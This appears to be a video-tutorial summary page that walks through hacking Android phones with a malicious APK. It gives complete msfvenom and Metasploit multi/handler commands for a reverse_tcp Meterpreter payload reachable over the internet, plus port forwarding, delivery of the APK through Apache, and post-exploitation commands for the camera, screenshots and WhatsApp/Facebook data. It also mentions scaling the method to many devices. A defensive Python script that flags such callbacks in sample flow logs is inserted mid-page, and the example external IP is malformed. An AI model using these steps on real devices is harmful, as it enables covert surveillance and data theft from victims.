Mobile Hacking with Malicious APK Files

Aug 11, 2024

How to Hack: Hacking Mobile Devices with Malicious APK Files

Overview

  • Host Meterpreter listeners that are reachable from the internet
  • Use a malicious APK file to hack into a mobile device
  • Gain complete control and access to the mobile device
  • Demonstration using Kali Linux and a mobile device

Preparation

Kali Linux Setup

  • Ensure Kali Linux is running
  • Mobile device connected via mobile data (not the local network), so the callback has to cross the internet
  • Confirm the mobile device has its own public IP address, distinct from the lab network

Hosting Listener and Delivery Mechanism

  1. Identify Internal IP
    • Use ifconfig to find internal IP address (e.g., 192.168.1.23)
  2. Setup Browser for Router Configuration
    • Access router (e.g., 192.168.1.254)
    • Identify external IP address (e.g., 202.202.166.63.69)
  3. Port Forwarding Configuration
    • Forward port 4444 on the router to the Kali Linux machine (the Metasploit handler)
    • Set up the Apache web server to deliver the APK file on port 8001 (forwarded as well)
    • Command to start Apache: service apache2 start
    • Verify Apache is running: check the service status and the listening port
    • Apply the port forwarding settings on the router

Creating Malicious APK File

  1. Using MSFVenom
    • Command: msfvenom -p android/meterpreter/reverse_tcp LHOST=<External IP> LPORT=4444 -o <path>/android_device.apk
    • Ensure correct LHOST (external IP) for internet access
  2. Deliver APK via Apache Web Server
    • Host APK file on Apache server

Setting Up Listener

  1. Metasploit Console
    • Command: msfconsole -q
    • Use multi-handler: use exploit/multi/handler
    • Set payload: set payload android/meterpreter/reverse_tcp
    • Show options: show options
    • Set LHOST to the internal IP (the router forwards port 4444 to it) and LPORT to 4444
    • Start listener: exploit

Executing and Gaining Access

  1. On Android Device
    • Access APK file via browser: http://<External IP>:8001/android_device.apk
    • Download and install APK file
    • Grant permissions and open the app
  2. Post-Exploitation Commands
    • Gain information and control using commands:
      • sysinfo - Device information
      • app_run, app_install - Manage applications
      • webcam_list, webcam_chat, screenshot - Access camera and screen
      • pwd, ls, cd - Navigate filesystem
    • Access sensitive data (e.g., Facebook, WhatsApp directories)
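From the network side, the walkthrough above produces one recognisable artefact: once the app is opened, a phone on the inside of a network holds a long-lived outbound TCP session to a public address on the handler port (4444 in the page's msfvenom and multi/handler steps). The following detection script is an added example for defenders and is not part of the original video or write-up. The flow-log format, the sample lines, the RFC 1918 ranges used to decide what counts as "internal", and the allow-list of expected ports are all assumptions constructed for this example.

```python
"""Flag Meterpreter-style reverse_tcp callbacks in flow logs (added example).

An internal device talking to a public host on an unusual port, for a long
time or repeatedly, is the network-side signature of the reverse_tcp payload
described on the page.  Everything below (log format, sample data, port lists)
is constructed for illustration.
"""
from collections import Counter
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

# Ranges treated as "inside the network" (RFC 1918).  Assumption for the example.
INTERNAL_NETS = [ip_network("10.0.0.0/8"), ip_network("172.16.0.0/12"),
                 ip_network("192.168.0.0/16")]

# Ports an ordinary phone talks to all day.  Assumed allow-list; tune per site.
EXPECTED_PORTS = {53, 80, 123, 443, 465, 587, 993, 5228}

# Metasploit's default handler port, the value used in the page's commands.
DEFAULT_HANDLER_PORTS = {4444}

# Constructed sample log: timestamp src dst dport bytes duration_seconds
SAMPLE_FLOWS = """\
2024-08-11T10:01:03Z 10.20.0.15 142.250.72.14 443 3120 2
2024-08-11T10:01:09Z 10.20.0.15 203.0.113.7 4444 84120 1800
2024-08-11T10:02:41Z 10.20.0.22 198.51.100.9 80 540 1
2024-08-11T10:03:05Z 10.20.0.15 203.0.113.7 4444 92000 3600
2024-08-11T10:03:19Z 10.20.0.31 10.20.0.1 53 120 0
2024-08-11T10:04:00Z 10.20.0.22 198.51.100.44 8080 2200 4
"""


@dataclass(frozen=True)
class Flow:
    ts: str
    src: str
    dst: str
    dport: int
    nbytes: int
    duration: int


@dataclass(frozen=True)
class Alert:
    src: str
    dst: str
    dport: int
    reason: str


def is_internal(addr: str) -> bool:
    """True when the address falls in one of the assumed internal ranges."""
    ip = ip_address(addr)
    return any(ip in net for net in INTERNAL_NETS)


def parse_flows(text: str) -> list[Flow]:
    """Parse the whitespace-separated flow format defined above."""
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, dport, nbytes, dur = line.split()
        flows.append(Flow(ts, src, dst, int(dport), int(nbytes), int(dur)))
    return flows


def flag_callbacks(flows: list[Flow], long_session: int = 300) -> list[Alert]:
    """Return one Alert per suspicious (src, dst, dport) triple.

    A flow qualifies when it leaves the internal ranges for an external host on
    a port outside EXPECTED_PORTS and either hits a known handler port or stays
    open for at least `long_session` seconds (an interactive shell, not a page
    load).  Repeated flows to the same triple are counted, since a payload that
    reconnects after losing its session produces a series of them.
    """
    hits: Counter[tuple[str, str, int]] = Counter()
    reasons: dict[tuple[str, str, int], str] = {}
    for f in flows:
        if is_internal(f.dst) or f.dport in EXPECTED_PORTS:
            continue
        key = (f.src, f.dst, f.dport)
        if f.dport in DEFAULT_HANDLER_PORTS:
            reasons[key] = f"default Metasploit handler port {f.dport}"
        elif f.duration >= long_session:
            reasons[key] = f"long-lived session ({f.duration}s) on uncommon port"
        else:
            continue
        hits[key] += 1
    alerts = []
    for key, n in hits.items():
        suffix = f", {n} reconnects" if n > 1 else ""
        alerts.append(Alert(*key, reasons[key] + suffix))
    return alerts


if __name__ == "__main__":
    for a in flag_callbacks(parse_flows(SAMPLE_FLOWS)):
        print(f"{a.src} -> {a.dst}:{a.dport}  {a.reason}")
```

On the sample data only the phone at 10.20.0.15 is reported: two sessions to the same external host on port 4444, the first of them half an hour long. The 8080 flow from 10.20.0.22 is skipped because it is short and not on a handler port, which is the trade-off to keep in mind: a handler moved off 4444 is caught only by the duration rule, so the session-length threshold matters more than the port list.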

Additional Notes

  • Same method can be applied to other devices (e.g., laptops, tablets)
  • Future scenarios involve hosting listeners on cloud providers for scalable operations
  • Manage numerous devices seamlessly

Conclusion

  • Importance of understanding cyber security techniques
  • Call to action: Like, subscribe, and leave comments for further engagement

Thank you for watching!